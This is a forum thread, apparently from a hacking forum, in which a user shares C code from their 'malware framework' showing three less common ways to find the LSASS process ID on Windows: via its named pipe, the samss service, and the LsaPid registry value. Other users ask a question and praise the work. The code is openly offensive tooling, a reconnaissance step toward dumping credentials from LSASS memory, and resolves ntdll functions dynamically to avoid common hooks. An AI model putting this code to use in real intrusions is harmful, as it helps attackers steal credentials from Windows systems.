3 uncommon techniques for identifying the process ID for LSASS

smelly__vx · 06.04.2023

This is code I developed for my malware framework. I want to share some code snippets here. This research originates from MODEXP.


//generic helper function, is the dll loaded?
HMODULE TryLoadDllMultiMethodW(_In_ PWCHAR DllName)
{
    HMODULE hModule;

    if (!IsDllLoadedW(DllName))
        hModule = LoadLibraryW(DllName);
    else
        hModule = GetModuleHandleEx2W(DllName);

    return hModule;
}

//method 1 - get pid from named Pipe
DWORD MpfGetLsaPidFromNamedPipe(VOID)
{
    UNICODE_STRING Pipe = { 0 };
    NTOPENFILE NtOpenFile = NULL;
    NTFSCONTROLFILE NtfsControlFile = NULL;
    NTCLOSE NtClose = NULL;
    HMODULE hModule = NULL;
    IO_STATUS_BLOCK IoBlock = { 0 };
    OBJECT_ATTRIBUTES Attributes = { 0 };
    DWORD ProcessId = ERROR_SUCCESS;
    HANDLE hHandle = INVALID_HANDLE_VALUE;
    NTSTATUS Status = STATUS_SUCCESS;
    LPSTR InputBuffer = (LPSTR)"ServerProcessId";

    hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
    if (hModule == NULL)
        return -1;

    NtOpenFile = (NTOPENFILE)GetProcAddressA((DWORD64)hModule, "NtOpenFile");
    NtfsControlFile = (NTFSCONTROLFILE)GetProcAddressA((DWORD64)hModule, "NtFsControlFile");
    NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");

    if (!NtOpenFile || !NtfsControlFile || !NtClose)
        return -1;

    RtlInitUnicodeString(&Pipe, L"\\Device\\NamedPipe\\lsass");

    InitializeObjectAttributes(&Attributes, &Pipe, OBJ_CASE_INSENSITIVE, 0, NULL);

    Status = NtOpenFile(&hHandle, FILE_READ_ATTRIBUTES, &Attributes, &IoBlock, FILE_SHARE_READ, NULL);
    if (!NT_SUCCESS(Status))
        goto EXIT_ROUTINE;

    Status = NtfsControlFile(hHandle, NULL, NULL, NULL, &IoBlock, FSCTL_PIPE_GET_PIPE_ATTRIBUTE, InputBuffer, (ULONG)StringLengthA(InputBuffer) + 1, &ProcessId, sizeof(DWORD));
    if (!NT_SUCCESS(Status))
        goto EXIT_ROUTINE;


EXIT_ROUTINE:

    if (hHandle)
        NtClose(hHandle);

    return ProcessId;
}


//method 2 - get lsass pid from service manager
DWORD MpfGetLsaPidFromServiceManager(VOID)
{
    SC_HANDLE Manager = NULL, ServiceHandle = NULL;
    DWORD ProcessId = ERROR_SUCCESS, BytesNeeded = ERROR_SUCCESS;
    SERVICE_STATUS_PROCESS ServiceStatus = { 0 };

    Manager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT);
    if (Manager == NULL)
        return 0;

    ServiceHandle = OpenServiceW(Manager, L"samss", SERVICE_QUERY_STATUS);
    if (ServiceHandle == NULL)
        goto EXIT_ROUTINE;

    if(!QueryServiceStatusEx(ServiceHandle, SC_STATUS_PROCESS_INFO, (LPBYTE)&ServiceStatus, sizeof(ServiceStatus), &BytesNeeded))
        goto EXIT_ROUTINE;

    ProcessId = ServiceStatus.dwProcessId;

EXIT_ROUTINE:

    if(ServiceHandle)
        CloseServiceHandle(ServiceHandle);

    if (Manager)
        CloseServiceHandle(Manager);

    return ProcessId;
}

//method 3 - get lsass pid from registry
DWORD MpfGetLsaPidFromRegistry(VOID)
{
    NTOPENKEY NtOpenKey = NULL;
    NTQUERYVALUEKEY NtQueryValueKey = NULL;
    NTCLOSE NtClose = NULL;
    UNICODE_STRING LsaRegistryPath = { 0 };
    UNICODE_STRING LsaValue = { 0 };
    OBJECT_ATTRIBUTES Attributes = { 0 };
    HANDLE hKey = NULL;
    NTSTATUS Status = STATUS_SUCCESS;
    HMODULE hModule = NULL;
    DWORD LsassPid = ERROR_SUCCESS;
    UCHAR Buffer[sizeof(KEY_VALUE_INFORMATION_CLASS) * sizeof(DWORD)] = { 0 };
    PKEY_VALUE_PARTIAL_INFORMATION ValueObject = (PKEY_VALUE_PARTIAL_INFORMATION)Buffer;
    DWORD BufferLength = 0;
    PDWORD dwDispose = NULL;

    hModule = GetModuleHandleW(L"ntdll.dll");
    if (hModule == NULL)
        goto EXIT_ROUTINE;

    NtOpenKey = (NTOPENKEY)GetProcAddressA((DWORD64)hModule, "NtOpenKey");
    NtQueryValueKey = (NTQUERYVALUEKEY)GetProcAddressA((DWORD64)hModule, "NtQueryValueKey");
    NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");

    if (!NtOpenKey || !NtQueryValueKey || !NtClose)
        goto EXIT_ROUTINE;
    
    RtlInitUnicodeString(&LsaRegistryPath, L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Lsa");
    RtlInitUnicodeString(&LsaValue, L"LsaPid");
    InitializeObjectAttributes(&Attributes, &LsaRegistryPath, OBJ_CASE_INSENSITIVE, NULL, NULL);

    Status = NtOpenKey(&hKey, KEY_QUERY_VALUE, &Attributes);
    if (!NT_SUCCESS(Status))
        goto EXIT_ROUTINE;

#pragma warning( push )
#pragma warning( disable : 6260)
    Status = NtQueryValueKey(hKey, &LsaValue, KeyValuePartialInformation, Buffer, (sizeof(KEY_VALUE_INFORMATION_CLASS) * sizeof(DWORD)), &BufferLength);
    if (!NT_SUCCESS(Status))
        goto EXIT_ROUTINE;
#pragma warning( pop ) 

    LsassPid = *(PDWORD)&ValueObject->Data[0];
    // = *dwDispose;

EXIT_ROUTINE:

    if (hKey)
        NtClose(hKey);

    return LsassPid;
}

DimmuBurgor · 06.04.2023

Shouldn't input for NamedPipe be uni instead of lpstr?

smelly__vx · 06.04.2023

DimmuBurgor сказал(а):

Shouldn't input for NamedPipe be uni instead of lpstr?

No, FSCTL_PIPE_GET_PIPE_ATTRIBUTE expects an LPSTR value and returns the PID to a DWORD

DimmuBurgor · 06.04.2023

smelly__vx сказал(а):

hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll"); if (hModule == NULL) return -1;

Yeah I guess I missed this ^ nvm

spartak · 12.04.2023

I would never even think about checking registry keys. Cool stuff.

3 uncommon techniques for identifying the process ID for LSASS

smelly__vx

RAID-массив

DimmuBurgor

CPU register

smelly__vx

RAID-массив

DimmuBurgor

CPU register

spartak

floppy-диск